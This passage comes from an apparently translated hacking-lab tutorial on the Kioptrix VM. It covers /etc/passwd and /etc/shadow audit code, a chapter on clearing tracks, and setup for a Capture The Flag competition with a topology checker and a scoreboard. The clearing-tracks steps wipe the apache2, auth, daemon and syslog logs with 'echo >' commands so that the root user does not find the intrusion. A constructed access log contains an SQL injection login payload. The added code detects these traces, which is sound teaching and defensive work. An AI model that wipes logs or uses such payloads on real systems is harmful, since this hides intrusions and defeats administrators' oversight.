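# password is given; an empty field means no password is required at all.
CONSTRUCTED_SHADOW = """\
root:$1$c0nstruc$ted.hash.placeholder.0:17168:0:99999:7:::
john:$1$c0nstruc$ted.hash.placeholder.1:17168:0:99999:7:::
robert:$1$c0nstruc$ted.hash.placeholder.2:17168:0:99999:7:::
alex:!:17168:0:99999:7:::
syskioptrix::17168:0:99999:7:::
"""

RESTRICTED_SHELL = "/bin/kshell"   # what ordinary users get on this host (7.1)


def parse_colon_file(text):
    """Yield the ':'-separated fields of every non-blank line."""
    for line in text.splitlines():
        if line.strip():
            yield line.split(":")


def audit_passwd(passwd_text):
    """Findings: extra UID-0 or GID-0 accounts, and human accounts (UID >= 1000)
    whose login shell is not the restricted shell the other employees use."""
    findings = []
    for fields in parse_colon_file(passwd_text):
        if len(fields) != 7:
            findings.append("malformed:%s" % fields[0])
            continue
        name, _pw, uid, gid, _gecos, _home, shell = fields
        if uid == "0" and name != "root":
            findings.append("uid0:%s" % name)
        if gid == "0" and name != "root":
            findings.append("gid0:%s" % name)
        if uid.isdigit() and int(uid) >= 1000 and shell != RESTRICTED_SHELL:
            findings.append("shell:%s=%s" % (name, shell))
    return findings


def audit_shadow(shadow_text):
    """Findings: accounts whose password field is empty (no password needed)."""
    return ["nopass:%s" % f[0] for f in parse_colon_file(shadow_text)
            if len(f) > 1 and f[1] == ""]


def passwd_world_writable(mode):
    """True if an st_mode lets group or others write the file (7.5 set 777)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


if __name__ == "__main__":
    print(audit_passwd(CONSTRUCTED_PASSWD))
    print(audit_shadow(CONSTRUCTED_SHADOW))
    print(passwd_world_writable(0o100777), passwd_world_writable(0o100644))
```

On a live system the same functions take open("/etc/passwd").read(), open("/etc/shadow").read() (root only) and os.stat("/etc/passwd").st_mode. The position trick in step 3 above does not help against this: a second UID-0 line is flagged wherever it sits in the file.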

CHAPTER 9:
CLEARING TRACK
9.1.

Restoring john's access rights

john is now a root user. If we leave it that way, the real root user will become suspicious, and that could be the end of our takeover of the server.

Here are the steps to restore john's access rights:

1. As root, change john's line in /etc/passwd back to its original values (the figure shows the line before and after).

2. As root, change the permissions of /etc/passwd back to 644 with chmod 644 /etc/passwd (the figure shows the permissions before and after).

9.2.

Removing the service log files

To remove more of our traces, in particular the record that we logged in as root, we must erase the contents of the service log files. All log files are located in the directory /var/log, whose contents are shown in the original figure.

From the figure we see how lucky we are to have root privileges, which let us do anything on the system.

The service logs we want to clear are those of apache2, ssh, daemon and syslog.

1. Removing the apache2 log

Steps:

1. Change to the directory /var/log/apache2 (figure).

To see that our exploitation through apache2 was recorded in its log, read the file access.log.1; the result is in the figure.

The circled line contains one of the characters that trigger SQL injection: proof of our brute force with SQL Inject Me.

The figure also shows the requests nmap made against the target, and our IP address recorded in the apache2 log.

2. Preferably we do not delete the files. We simply overwrite each one with an empty line, by typing the command

echo > [name of the file to overwrite]

Then ls -l shows the result in the figure.

Note that truncating a file this way leaves a one-byte file with a fresh modification time, which an administrator comparing it with the rotated copies can notice, and it does nothing about log lines already forwarded to a remote syslog server.

The apache2 log files have been dealt with. Now we do the same for the other service logs.
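The traces the book finds in access.log.1 can be picked out automatically. The following added example (mine, not the book's code) scans Apache combined-format log lines for SQL injection characters in the decoded request, scanner User-Agent strings and the burst of 404 responses a directory brute force leaves behind. The log lines are constructed; the DirBuster and Nmap User-Agent markers are the tools' default strings and are assumptions here, as are the helper names.

```python
"""Detection over Apache combined-format access log lines for the traces the
book finds in access.log.1. Added example, not the book's code. The log lines
are constructed; the scanner User-Agent markers are the tools' default strings
and are assumptions here."""
import collections
import re
import urllib.parse

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
# a quote followed by OR/AND, "or 1=1", "'='" and "union select", after URL decoding
SQLI_RE = re.compile(
    r"'\s*(or|and)\s|\bor\b\s+\d+\s*=\s*\d+|'\s*=\s*'|\bunion\b\s+\bselect\b", re.I)
SCANNER_UA_MARKERS = ("DirBuster", "Nmap Scripting Engine")
BRUTE_404_THRESHOLD = 20        # 404s from one address before we call it a brute force

ATTACKER = "192.168.36.163"     # the BackTrack machine's address in the book


def _line(ip, request, status, ua):
    """Build one constructed combined-format line."""
    return '%s - - [02/Jan/2017:10:00:00 +0700] "%s HTTP/1.1" %s 512 "-" "%s"' % (
        ip, request, status, ua)


FIREFOX = "Mozilla/5.0 (X11; Linux i686; rv:17.0) Gecko/20100101 Firefox/17.0"
CONSTRUCTED_LOG = [
    _line("192.168.36.1", "GET /index.php", "200", FIREFOX),
    _line(ATTACKER, "GET /checklogin.php?myusername=john&mypassword="
                    "%27+OR+username+IS+NOT+NULL+OR+username+%3D+%27", "200", FIREFOX),
    _line(ATTACKER, "GET /", "200",
          "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"),
] + [
    _line(ATTACKER, "HEAD /guess%d/" % i, "404",
          "DirBuster-1.0-RC1 (http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)")
    for i in range(25)
]


def analyze(lines):
    """Return {'sqli': [(ip, decoded request path)], 'scanners': {ip: [markers]},
    'bruteforce_ips': [ip]} for the given access log lines."""
    sqli, scanners, not_found = [], {}, collections.Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                    # not combined format: skip, do not guess
        ip, ua = m["ip"], m["ua"]
        decoded = urllib.parse.unquote_plus(m["path"])
        if SQLI_RE.search(decoded):
            sqli.append((ip, decoded))
        for marker in SCANNER_UA_MARKERS:
            if marker.lower() in ua.lower():
                scanners.setdefault(ip, set()).add(marker)
        if m["status"] == "404":
            not_found[ip] += 1
    return {
        "sqli": sqli,
        "scanners": {ip: sorted(v) for ip, v in scanners.items()},
        "bruteforce_ips": sorted(ip for ip, n in not_found.items()
                                 if n >= BRUTE_404_THRESHOLD),
    }


if __name__ == "__main__":
    for key, value in analyze(CONSTRUCTED_LOG).items():
        print(key, value)
```

Run it over a real file with analyze(open("/var/log/apache2/access.log.1").read().splitlines()). The injection check decodes the URL first, which is why a value like %31%27%20%4F%52 is caught even though it never matched anything on the server; a POST body is not in the access log, so a form submitted by POST leaves only the request line and must be caught from the application's own logging or the database.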


2. Removing the ssh log

Steps:

1. The ssh log is kept in the file /var/log/auth.log. To see whether our IP address was recorded, type the command: grep 192.168.36.163 /var/log/auth.log (figure).

2. Overwrite the file with an empty line, with the command echo > /var/log/auth.log (figure).

3. Removing the daemon log

Steps:

1. The daemon log is kept in the file /var/log/daemon.log. To see whether our IP address was recorded, type the command: grep 192.168.36.163 /var/log/daemon.log (figure).

2. Overwrite the file with an empty line, with the command echo > /var/log/daemon.log (figure).


4. Removing the syslog log

Steps:

1. The syslog log is kept in the files /var/log/syslog.log and /var/log/syslog.log.0. To see whether our IP address was recorded, type the commands: grep 192.168.36.163 /var/log/syslog.log and grep 192.168.36.163 /var/log/syslog.log.0 (figure).

2. Overwrite the file with an empty line, with the command echo > /var/log/syslog.log.0 (figure).

Conclusion:

Because we have cleared every log file we found, the chance that the root user finds our trail is minimised.

Additional:

After all the activities in this tutorial, the last thing to do is to log out of the ssh session as root.

CHAPTER 10:
SET-UP CTF – Fast Hacking
Competition

10.1. Introduction

A network security competition tests the ability of computer users in network administration, information system security and finding security loopholes in a system's software, within a limited time, so that they become familiar with everyday network and server security work. There are several types of security competition, namely:

a. Death Match Tournament: a hacking competition on a local area network, in which each participant tries to configure their own server to close its vulnerabilities while hacking the servers of their opponents.

According to the Ministry of Defense, in outline, the topology is as shown in the original figure.

The participants in a Death Match Tournament are called the Blue Team, and each hardens its own server. Several other participants act as examiners (the Red Team) and try to attack and take over the Blue Team servers. A Blue Team must defend its server using only locally available software packages, without using the internet. The winner is the Blue Team that survives the attacks of the Red Team and of the other Blue Teams.


b. Capture The Flag (CTF): in this model all participants compete to take over a server provided by the committee. Participants do no hardening at first, since their goal is to get into the server as quickly as possible. Once a team has taken over the server, it is allowed to harden it so that no other participant can log in. After entering the server, participants must find a flag (a file or a code) prepared by the committee; the participant who finds the flag is declared the winner.

c. Digital Forensic Investigation: a competition in which participants use technology and science to examine digital objects provided by the committee, and prove theories that may serve as evidence, answering what happened and what the hacker did in the system, all reported in a document.

d. Face to Face Competition: in this model all participants attack each other. The participants are divided into groups of two, and no group has a connection to the other groups, so that every pair is isolated from the rest. Within each pair, each participant attacks the other's server system directly. The winner of each pair then competes with the winners of the other pairs until the overall winner is found. In other words, this is a "one on one" competition model.

e. Cyber Security Challenge: a model in which participants compete to identify all the vulnerabilities in a fictitious network modelled on an industry or company. Participants must also provide a solution for each security gap they find. Every activity must be documented so that the judges can decide which participant deserves to win.

f. Cyber Quests/Security Quiz: an online quiz that tests the participants' ability and understanding in the field of information security. Typical questions cover web site vulnerabilities, digital forensics, knowledge of malware, and so on. This competition usually lasts only one (1) to two (2) hours.

g. Cyber Grand Challenge: a model in which participants are given a number of programs containing security holes. Participants must write a patch for each program and analyse the vulnerability. The main purpose of this competition is to train the participants' skills in professional software security analysis.


h. Pwn2Own: a security competition model first organised by CanSecWest in 2007. Participants are challenged to exploit software and mobile devices that are widely used in everyday life. The competition is called Pwn2Own because a participant who successfully exploits (pwns) a device is entitled to keep (own) it. The competition also proves that there will always be security threats to widely used software and mobile devices, so that their developers are expected to keep improving them, especially on the security side.

i. Embedded System Security Discover Vulnerabilities: a model in which participants compete to find all the vulnerabilities planted in a common embedded-system device. This competition model helps the device makers improve their products, especially their security.

10.2. SET-UP CTF – Fast Hacking Competition

In this book, we will try to build a simple competition using the Capture The Flag model (commonly abbreviated as CTF), using the Operating System Kioptrix Server Level 1.3 Hyper-V, which can be downloaded from the page http://www.kioptrix.com/blog/test-page/. Basically, the topology of this type of competition is very easy to build, because we only need to make sure that all the competition participants can access a server that has been prepared by the committee.

Some of the provisions that we have to consider in building the Capture The Flag competition scenario this time are:

1. There is a server running the Operating System Kioptrix Server Level 1.3 Hyper-V, installed in a Virtual Machine. The server is installed on a laptop, hereinafter referred to as the target.

2. There are five laptops running the Operating System Backtrack 5 R3 GNOME 32bit, installed in a Virtual Machine. These five laptops are hereinafter referred to as the participants.

3. There is an Access Point that connects all of these devices. The Access Point acts as the link between them and forms a simple network topology.

In other words, six laptops and a wireless Access Point are needed to build the competition with the above scenario. First, we will prepare the server laptop, then the five participant laptops.

Basically, the preparation of this competition is not much different from the preparation of the SET-UP HACKING LAB in Chapter 2. The most fundamental difference is that in Chapter 2, the network adapter of the Virtual Machine is configured as NAT, not bridged, so the network becomes isolated (closed). In this competition, we have to create a network that is open, so that each participant can carry out the hacking against the server.
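The NAT-versus-bridged point above is the one that most often breaks a lab like this on the day: a participant VM left on a hypervisor NAT adapter gets a private address that no other machine on the Access Point can reach. The following is an added example, not code from the book, that a committee could run on its inventory before the competition starts. The AP subnet and all host addresses are constructed sample values, and the assumption that a NAT guest shows up with an address outside the AP subnet is mine.

```python
# Added example (not from the book): verify that every machine in a CTF lab sits on
# the Access Point's subnet (bridged adapters) rather than behind a hypervisor NAT.
# All addresses below are constructed sample values.
from ipaddress import ip_address, ip_network

# Assumption: the Access Point hands out addresses from this range.
AP_SUBNET = ip_network("192.168.1.0/24")

# Constructed inventory: the target VM plus the five participant VMs.
HOSTS = {
    "target":        "192.168.1.10",
    "participant-1": "192.168.1.101",
    "participant-2": "192.168.1.102",
    "participant-3": "10.0.2.15",    # a guest still on a NAT adapter (constructed)
    "participant-4": "192.168.1.104",
    "participant-5": "192.168.1.105",
}


def check_topology(hosts, ap_subnet):
    """Return (ok, problems). ok is True only when every host is inside ap_subnet.
    problems lists (name, address, reason) for hosts the other machines cannot reach."""
    problems = []
    for name, addr in hosts.items():
        ip = ip_address(addr)
        if ip not in ap_subnet:
            if ip.is_private:
                reason = "private address outside the AP subnet, likely a NAT adapter"
            else:
                reason = "outside the AP subnet"
            problems.append((name, addr, reason))
    return (not problems, problems)


def reachable_participants(hosts, ap_subnet):
    """Participants that can actually reach the target: those on its subnet.
    If the target itself is off the AP subnet, nobody can reach it."""
    target = ip_address(hosts["target"])
    if target not in ap_subnet:
        return []
    return sorted(name for name, addr in hosts.items()
                  if name != "target" and ip_address(addr) in ap_subnet)


if __name__ == "__main__":
    ok, problems = check_topology(HOSTS, AP_SUBNET)
    print("topology OK" if ok else "topology problems:")
    for name, addr, reason in problems:
        print(f"  {name} ({addr}): {reason}")
    print("participants able to reach the target:",
          reachable_participants(HOSTS, AP_SUBNET))
```

Because the whole point of the open network is that every participant can reach the target, the same property means every participant can also reach every other participant's laptop; the committee should remind players that their own Backtrack VMs are exposed on that subnet for the duration of the game.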

According to the type of competition, this CTF gives priority to the speed with which participants are able to master the server system, and also to the hardening ability of participants to prevent other participants from taking over the system. Thus, if Participant 1 has mastered the target system, then he should be able to prevent the other participants (Participant 2, Participant 3, Participant 4, and Participant 5) from taking control of the target system.
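The two things the paragraph above rewards, speed to the first takeover and the ability to hold the server afterwards, can be scored from a simple timeline. The following is an added example, not the book's own scoring method: it assumes the committee polls a token file on the target at fixed intervals (for instance over its own administrative access) and records whose token is present. The poll results here are constructed inline so the scoring runs offline.

```python
# Added example (not from the book): a minimal king-of-the-hill scoreboard for the
# competition model described above. Assumption: the committee polls a token file on
# the target every 60 seconds and records which participant's token is present.
from collections import defaultdict

# Constructed observations: (seconds since start, owner of the token file).
# None means no participant's token is present yet.
OBSERVATIONS = [
    (0, None),
    (60, None),
    (120, "participant-1"),   # first to master the target
    (180, "participant-1"),
    (240, "participant-1"),
    (300, "participant-3"),   # participant-3 took over: participant-1's hardening failed
    (360, "participant-3"),
    (420, "participant-1"),   # participant-1 regained control
    (480, "participant-1"),
]


def first_capture(observations):
    """(name, time) of the first participant to take control; (None, None) if nobody did."""
    for t, owner in observations:
        if owner is not None:
            return owner, t
    return None, None


def hold_times(observations):
    """Seconds each participant held the target. Each interval between two polls is
    credited to the owner seen at the earlier poll, so retention is what counts."""
    held = defaultdict(int)
    for (t0, owner), (t1, _) in zip(observations, observations[1:]):
        if owner is not None:
            held[owner] += t1 - t0
    return dict(held)


def takeovers(observations):
    """How many times control passed from one participant to a different one."""
    count = 0
    prev = None
    for _, owner in observations:
        if owner is None:
            continue
        if prev is not None and owner != prev:
            count += 1
        prev = owner
    return count


def scoreboard(observations, capture_bonus=100):
    """Score = seconds held plus a bonus for the first capture.
    Returns a list of (name, score) sorted best first, ties broken by name."""
    scores = defaultdict(int, hold_times(observations))
    first, _ = first_capture(observations)
    if first is not None:
        scores[first] += capture_bonus
    return sorted(scores.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    print("first capture:", first_capture(OBSERVATIONS))
    print("takeovers:", takeovers(OBSERVATIONS))
    for name, score in scoreboard(OBSERVATIONS):
        print(f"{name:15s} {score}")
```

The 60-second poll interval is the weak spot of this design: a takeover and a recovery that both happen between two polls are invisible, so a committee that wants to reward hardening should poll often enough that brief losses of control still show up in the timeline.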